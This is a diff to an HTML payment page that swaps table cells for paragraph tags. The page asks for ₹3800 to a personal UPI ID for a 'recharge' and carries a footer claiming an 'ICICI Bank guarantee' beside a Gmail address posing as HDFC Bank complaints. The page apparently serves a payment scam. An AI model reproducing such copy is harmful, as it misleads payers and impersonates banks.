--- a/repayyx.payxfast.com/index.html
+++ b/repayyx.payxfast.com/index.html
@@ -11,12 +11,12 @@
     <div class="box1">
         <table width="100%">
                 <td>Amount</td>
-             <td align="right" class=amount displap">₹ 3800 </td>
+             <p align="right" class=amount displap">₹ 3800 </p>
                 <td><button class="cpb" onclick="copyAmount()">COPY</button></td>
                 <tr>
                     <tr>
                 <td>VPA/UPI</td>
-                <td align="right" class="upi-display">unicashofficial02@okhdfcbank</td>
+                <p align="right" class="upi-display">unicashofficial02@okhdfcbank</p>
                 <td><button class="cpb" onclick="copyUPI()">COPY</button></td>
             </tr>
         </table>
@@ -24,8 +24,8 @@
             <tr> 
                 <tr>
                 <td>Name</td>
-                <td align="right">SHIPAN SHIL</td>
-            </tr>
+                <p align="right">SHIPAN SHIL</td>
+            </p>
         </table>
         <p class="a1">↓ Select payment method and pay ↓</p><tr>
         <table>
@@ -61,7 +61,8 @@
         </form><br>
 
          <center>
-        <p style="color: lightgray; font-size: 12px;">Dear customers: please give priority to this channel to recharge! Support UPI account withdrawal! ICICI Bank guarantee! Safe and reliable! If you have any questions, please contact: <br>
+        <h6 style="color: lightgray; font-size: 12px;">Dear customers: please give priority to this channel to recharge! Support UPI account withdrawal! ICICI Bank guarantee! Safe and reliable! If you have any questions, please contact:</h6>
+         <br>
             
  <p style= "color:blue;font-size:10px;"> hdfcbankcomplaintacceptance@gmail.com</center>
         </p>
